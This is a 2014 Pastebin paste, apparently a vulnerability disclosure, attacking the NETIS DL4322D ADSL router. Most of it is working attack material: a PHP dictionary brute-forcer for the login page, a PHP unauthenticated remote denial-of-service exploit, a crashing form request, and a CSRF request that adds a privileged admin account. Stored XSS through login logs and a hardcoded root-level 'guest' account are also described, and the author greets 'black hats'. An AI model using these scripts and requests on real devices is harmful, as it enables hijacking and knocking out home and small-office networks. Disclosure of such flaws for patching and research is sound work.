API tools faq
paste
Advertisement
Guest User

NETIS 0day

a guest
Oct 16th, 2014
1,489
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.79 KB | None | 0 0
raw download clone embed print report
  1. Vulnerable Device:
  2. NETIS DL4322D 300Mbps Wireless N ADSL2+ Modem Router Multiple vulnerabilites
  3. (Other models of netis may also suffer from this vulns)
  4. Vendor: http://www.netis-systems.com
  5. Product overview:
  6. http://www.netis-systems.com/en/products/ADSL2+-Wireless-Modem-Router/941.html
  7.  
  8. The netis DL4322D is a 3-in-1 device that combines the functions of a high speed ADSL2+ modem, 4-port NAT router and wireless N access point. It is designed to provide end-users with a one-stop solution to acquiring and sharing high-speed Internet access over a wired/wireless network. Supporting the latest ADSL standards, the DL4322D brings with it much higher speed than dial-up connections. It also provides some practical functions, such as Port Mapping for IPTV, Ethernet WAN, SNMP, IPv6, TR-069 and more. With this product, users can now enjoy more kinds of heavy bandwidth consuming applications like wireless HD video streaming.
  9.  
  10.  
  11. ===================================
  12. Vulns: Bruteforce/XSS/Denial Of Service(UnAuthenticated/Authenticated)/CSRF/
  13. Plaintext Passwords/HardCoded Usernames
  14.  
  15. ===================================
  16. 0) Bruteforce on login page:
  17. http://192.168.1.1/login.cgi
  18. There is no any anti-bruteforce implementation exists. (FULL PROOF CAPTCHA)
  19. So it is vulnerable to bruteforce.
  20.  
  21. =========== BRUTEFORCER ============
  22.  
  23. <?php
  24. $page='login.cgi';
  25. $usage='~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL . 'Usage:'. PHP_EOL .
  26.  
  27. 'php -f brute.php guest/user /tmp/dictionary.txt http://192.168.1.1/'. PHP_EOL . '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL;
  28. if(count($argv)!==4) die($usage);
  29. $uname=$argv[1];
  30. $passmassiv=$argv[2];
  31. $ip=$argv[3];
  32. $page=$ip . $page;
  33. $passmassiv=file($passmassiv) or die('Unable to open dictionary!');
  34.  
  35. foreach($passmassiv as $pass)
  36. {
  37.  
  38. $pass=trim($pass);
  39. $post='username=' . $uname.'&password=' .$pass . '&submit.htm%3Flogin.htm=Send';
  40.  
  41. $ch = curl_init();
  42. curl_setopt($ch,CURLOPT_URL,$page);
  43. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  44. curl_setopt($ch,CURLOPT_HEADER, true);
  45. curl_setopt($ch, CURLOPT_POST, sizeof($post));
  46. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  47. $response=curl_exec($ch);
  48.  
  49. if(!preg_match('/Username or password error/i',$response))
  50.  
  51. {
  52. echo 'OWNED! ' . $uname . ' PASSWD: ' . $pass. PHP_EOL;
  53. exit;
  54. }
  55. else
  56. {
  57. echo ' Verifying user: => ' . $uname . ' TRYING AS PASS:=> ' . $pass. PHP_EOL;
  58. }
  59.  
  60.  
  61.  
  62. }
  63.  
  64. unset($pass);
  65.  
  66. ?>
  67.  
  68. ======== EOF BRUTEFORCER ==============
  69.  
  70.  
  71.  
  72.  
  73. ===================================
  74. 1) XSS via incorrect login:password attempts.
  75.  
  76. Since web interface of this device default is open to PUBLIC there is a big chance to be owned.
  77. This device has a capability to log incorrect login:password attempts.
  78. But it fails to sanitise user input and then it stores it in log.Administrator can view this log.
  79. Once administrator tries to view injected logs via web interface=game over.
  80. Exploitation:
  81. Using XSS redirect admin to 3'rd party site.
  82. Exploit CSRF flaws(it is up to you) add new admin/kick remote machine to DMZ and etc. then logon to device.
  83.  
  84. SEE: XSS.png && unsanitized_input_passed.png
  85.  
  86. http://s017.radikal.ru/i400/1410/84/a50fc523715a.jpg
  87. http://s50.radikal.ru/i130/1410/d3/dc9606d635a2.jpg
  88.  
  89. ===================================
  90. 2) Remote Unauthenticated Denial Of Service Exploit.
  91. Since web interface is open to PUBLIC:(default)
  92.  
  93.  
  94. <?php
  95. error_reporting(0);//On production lol
  96. /*******************************************
  97. * NETIS DL4322D Unauthenticated *
  98. * Remote DENIAL OF SERVICE EXPLOIT *
  99. * /AkaStep *
  100. * On success this exploit simply *
  101. * reboots target's router *
  102. * (Connections will be interrupted as well)*
  103. * *****************************************/
  104.  
  105. $page='login.cgi';
  106. $usage='~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL . 'NETIS DL4322D REMOTE DENIAL OF SERVICE EXPLOIT'. PHP_EOL .
  107. 'Usage:'. PHP_EOL .
  108.  
  109. 'php -f netisdos.php http://REMOTE_OR_LOCAL_IP/'. PHP_EOL . '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL;
  110. if(count($argv)!==2) die($usage);
  111.  
  112. $ip=$argv[1];
  113. $page=$ip . $page;
  114.  
  115. if(file_get_contents($ip . 'login.htm')) echo '[+] Target is Online! [+]'. PHP_EOL;
  116. sleep(3);
  117. echo '[+] Sending Payload! [+]'. PHP_EOL;
  118. sleep(3);
  119.  
  120.  
  121. $payload=str_repeat('AKASTEP',500);
  122. $post='username=' . $payload.'&password=SAY HELLO TO BLACK HATS!&submit.htm%3Flogin.htm=Send';
  123.  
  124. $ch = curl_init();
  125. curl_setopt($ch,CURLOPT_URL,$page);
  126. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  127. curl_setopt($ch,CURLOPT_HEADER, true);
  128. curl_setopt($ch, CURLOPT_TIMEOUT, 12);
  129. curl_setopt($ch, CURLOPT_POST, sizeof($post));
  130. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  131. $response=curl_exec($ch);
  132. echo '[+] Payload WAS Sent... Please wait... [+]' .PHP_EOL;
  133. curl_close($ch);
  134. sleep(2);
  135.  
  136. if(!file_get_contents($page)) echo('[+] Remote Target Down! [+]'. PHP_EOL);
  137. exit;
  138.  
  139.  
  140. ?>
  141.  
  142.  
  143.  
  144.  
  145.  
  146. ===================================
  147. 3) DOS (Authenticated) but can be combined with XSS+CSRF remotely.
  148.  
  149. http://192.168.1.1/form2languageSelect.cgi
  150.  
  151. HEADERS:
  152.  
  153. Host: 192.168.1.1
  154. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
  155. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  156. Accept-Language: en-US,en;q=0.5
  157. Accept-Encoding: gzip, deflate
  158. DNT: 1
  159. Cookie: SessionID=
  160. Connection: keep-alive
  161. Content-Type: application/x-www-form-urlencoded
  162. Content-Length: 44
  163. If-Modified-Since: *
  164.  
  165.  
  166.  
  167.  
  168. DATA:
  169. selectLanguage=100&submit.htm%3Findex.htm=Send
  170.  
  171.  
  172. NOTE: Value 100 is illegal value that causes Denial Of service.
  173. Any current connection(s) will be broken permanently.
  174.  
  175. [root@ metasploit]# nmap -sS -Pn 192.168.1.1 -p 80
  176.  
  177. Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-15 22:59 AZST
  178. Nmap done: 1 IP address (0 hosts up) scanned in 0.46 seconds
  179.  
  180.  
  181.  
  182. [root@ metasploit]# nmap -sS -Pn 192.168.1.1 -p 80
  183.  
  184. Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-15 22:59 AZST
  185. Nmap done: 1 IP address (0 hosts up) scanned in 0.46 seconds
  186. [root@ metasploit]# nmap -sS -sU -PN -sV 192.168.1.1
  187.  
  188. Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-15 23:02 AZST
  189. Nmap done: 1 IP address (0 hosts up) scanned in 0.92 seconds
  190. [root@ metasploit]# ping 192.168.1.1
  191. PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
  192.  
  193.  
  194. Moreover after switching device to on/off states (aka multiple hard reboots) any attempt to access web interface will result in Denial Of service.(Device is somehow still poisoned in infinitive manner)
  195.  
  196.  
  197.  
  198. [root@ metasploit]# ping 192.168.1.1
  199. PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
  200. From 192.168.1.102 icmp_seq=17 Destination Host Unreachable
  201. From 192.168.1.102 icmp_seq=18 Destination Host Unreachable
  202. From 192.168.1.102 icmp_seq=19 Destination Host Unreachable
  203. From 192.168.1.102 icmp_seq=20 Destination Host Unreachable
  204. From 192.168.1.102 icmp_seq=21 Destination Host Unreachable
  205. From 192.168.1.102 icmp_seq=22 Destination Host Unreachable
  206. From 192.168.1.102 icmp_seq=23 Destination Host Unreachable
  207. From 192.168.1.102 icmp_seq=24 Destination Host Unreachable
  208. From 192.168.1.102 icmp_seq=25 Destination Host Unreachable
  209. From 192.168.1.102 icmp_seq=26 Destination Host Unreachable
  210. From 192.168.1.102 icmp_seq=27 Destination Host Unreachable
  211. From 192.168.1.102 icmp_seq=28 Destination Host Unreachable
  212. From 192.168.1.102 icmp_seq=29 Destination Host Unreachable
  213. From 192.168.1.102 icmp_seq=30 Destination Host Unreachable
  214. From 192.168.1.102 icmp_seq=31 Destination Host Unreachable
  215. From 192.168.1.102 icmp_seq=32 Destination Host Unreachable
  216. From 192.168.1.102 icmp_seq=33 Destination Host Unreachable
  217. From 192.168.1.102 icmp_seq=34 Destination Host Unreachable
  218. From 192.168.1.102 icmp_seq=35 Destination Host Unreachabl
  219.  
  220.  
  221.  
  222. ==========================================================================
  223.  
  224. 4)
  225. Multiple CSRF vulns: (all forms is prone to CSRF because there is no any ANTI-CSRF implementation at all)
  226.  
  227. Here is one while transmitting VIA POST request:
  228.  
  229. URL:
  230. http://192.168.1.1/form2userconfig.cgi
  231.  
  232.  
  233. REQUEST HEADERS:
  234.  
  235. Host: 192.168.1.1
  236. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
  237. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  238. Accept-Language: en-US,en;q=0.5
  239. Accept-Encoding: gzip, deflate
  240. DNT: 1
  241. Cookie: SessionID=
  242. Connection: keep-alive
  243. Content-Type: application/x-www-form-urlencoded
  244. Content-Length: 127
  245. If-Modified-Since: *
  246.  
  247.  
  248. DATA TO POST:
  249.  
  250. username=owned_device&privilege=2&newpass=aDhexLbT8&confpass=aDhexLbT8&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
  251.  
  252.  
  253. SEE: CSRF_VULNERABLE_FORMS.png
  254.  
  255. http://s019.radikal.ru/i632/1410/3b/2d738ae75ec5.jpg
  256.  
  257.  
  258. ==========================================================================
  259. 5)
  260.  
  261. Plaintext passwords
  262.  
  263.  
  264. SEE: PLAINTEXT_PASSWORDS_FROM_SOURCE_OF_PAGE.png
  265.  
  266. http://s008.radikal.ru/i306/1410/88/be4c3e20fa10.jpg
  267.  
  268. ==========================================================================
  269.  
  270. 6) Hardcoded usernames.
  271.  
  272. This device has 2 hardcoded accounts.
  273. guest and user
  274. guest <= it has a root privilegie
  275. user <= is a limited user
  276.  
  277. You can change paswords for them but you can't delete or rename them.
  278. ==========================================================================
  279.  
  280.  
  281. ===================== WITH LOVE FROM AZERBAIJAN ========================
  282.  
  283. packetstormsecurity.org
  284. packetstormsecurity.com
  285. packetstormsecurity.net
  286. securityfocus.com
  287. cxsecurity.com
  288. security.nnov.ru
  289. securtiyvulns.com
  290. securitylab.ru
  291. secunia.com
  292. securityhome.eu
  293. exploitsdownload.com
  294. osvdb.com
  295. websecurity.com.ua
  296. 1337day.com
  297. itsecuritysolutions.org
  298. waraxe.us
  299. exploit-db.com
  300. insecurety.net
  301. millikuvvetler.net
  302. b3yaz.org
  303.  
  304. Special respect's to CAMOUFL4G3 && Brendan Coles && ottoman38 && Ferid23 && Sexavet and to all
  305. Azerbaijan Black hatz,Aa team && to All Turkish hackers.
  306.  
  307. /AkaStep
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!